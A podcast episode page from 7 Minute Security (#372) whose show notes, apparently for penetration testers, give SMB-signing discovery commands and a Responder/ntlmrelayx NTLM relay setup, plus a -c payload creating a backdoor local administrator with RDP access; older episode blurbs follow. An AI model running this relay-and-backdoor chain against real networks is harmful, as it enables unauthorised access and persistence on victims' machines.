7 Minute Security15 Heinä 2019

7MS #372: Tales of Internal Pentest Pwnage - Part 5

Today's episode is brought to you by ITProTV. It's never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://pro.tv/7minute

Today I share the (hopefully) exciting and fun conclusion to last week's episode about a tale of internal pentest pwnage! A few important notes from today's episode:

Need to find which hosts on your network have SMB signing disabled, and then get a nice clean list of IPs as a result? Try this:

opt/responder/tools/RunFinger.py -i THE.SUBNET.YOU-ARE.ATTACKING/24 -g > hosts.txt grep "Signing:'False'" hosts.txt | grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' > targets.txt

Source: Pwning internal networks automagically

Ready to pass captured hashes from one host to another? Open responder.conf and turn SMB and HTTP to Off, then get Responder running in one window, and ntlmrelayx in another. Specifically, I like to use ntlmrelayx.py -tf targets.txt where targets.txt is the list of machines you found that are not using SMB signing. I also like to add a -c to run a string of my choice. Check out this fun evil little nugget:

net user /add ladmin1 s00p3rn4ughtyguy! /Y & net localgroup Administrators ladmin1 /add & net localgroup "Remote Desktop Users" ladmin1 /add

So the full command would be:

ntlmrelayx.py -tf targets.txt -c 'net user /add ladmin1 s00p3rn4ughtyguy! /Y & net localgroup Administrators ladmin1 /add & net localgroup "Remote Desktop Users" ladmin1 /add'

Check today's show notes at https://7ms.us for more information!

Kokeile Premiumia

Nauti 14 päivää ilmaiseksi

Tilaa Premium

Jaksot(720)

7MS #279: Patching Solutions Bake-Off - Part 4

Intro The patching solutions review concludes this week with Ivanti's patch solution, as well as PDQ Deploy/Inventory. As a quick reminder, here's where our bake-off currently sits: Ninite (covered i...

28 Syys 201715min

7MS #278: Interview with Rob Sell

Intro We're breaking ground with this episode, folks! For the first time in 7MS history, we've got a guest on the show (finally, right?!). Rob Sell is an IT manager who has been working in IT for many...

21 Syys 201756min

7MS #277: Patching Solutions Bake-Off - Part 3

ManageEngine Desktop Central Overall, I have to bluntly say that I really enjoyed playing with ManageEngine's solution. It's got a crap-ton of features built into it - above and beyond patching - that...

14 Syys 201713min

7MS #276: The CryptoLocker song

This is it! The worldwide Internet debut of an original infosec-themed song called CryptoLocker'd, and as the name implies, it's about a CryptoLocker incident. Here's the quick back story: A few years...

6 Syys 201712min

7MS #275: Patching Solutions Bake-Off - Part 2

This episode continues our series on comparing popular patching solutions, such as: Ninite ManageEngine Ivanti PDQ Ninite This week I focused on Ninite, and here's the TLDR version: Pros Does one ...

30 Elo 201711min

7MS #274: Speaking at ILTACON - Part 4

I'm back from Vegas! My talk went really well and I'm excited to tell you about it in today's episode. First, some conference/trip highlights: During the ILTACON conference I attended a great talk by ...

23 Elo 201715min

7MS #273: Speaking at ILTACON - Part 3

I ran out of time in episode #272 to tell you about why preparing to be a speaker for ILTACON was way more stressful that preparing for Secure360 a few months ago. The main points of difference/stress...

17 Elo 20179min

7MS #272: Speaking at ILTACON - Part 2

This is part 2 of a series focusing on public speaking - specifically for the ILTACON conference happening in Vegas this week. In this episode I share a high-level walkthrough of my talk and the 10 "B...

17 Elo 201711min

Kaikki yhdessä sovelluksessa

Kuuntele kaikki suosikkipodcastisi ja -äänikirjasi yhdessä paikassa.

Sinulle valikoitua sisältöä

Podme-sovelluksessa kokoat suosikkisi helposti omaan kirjastoosi. Saat meiltä myös kuuntelusuosituksia!

Jatka kuuntelua koska tahansa

Voit jatkaa siitä mihin jäit, myös offline-tilassa.

Premium

9,99 €/kk

Kaikki premium-podcastit
Ei mainoksia
Ei sitoutumista, peruuta koska tahansa

Aloita 14 päivän kokeilu

Premium

13,99 €/kk

Kaikki premium-podcastit
Ei mainoksia
Ei sitoutumista, peruuta koska tahansa
Yksi lisäkäyttäjä

Kokeile 14 päivää maksutta

Suosittua kategoriassa Politiikka ja uutiset

rss-tasta-on-kyse-ivan-puopolo-verkkouutiset

Tarinat ja äänet, joita rakastat kuunnella

Kuuntele kaikki suosikkipodcastisi ja -äänikirjasi

Lue lisää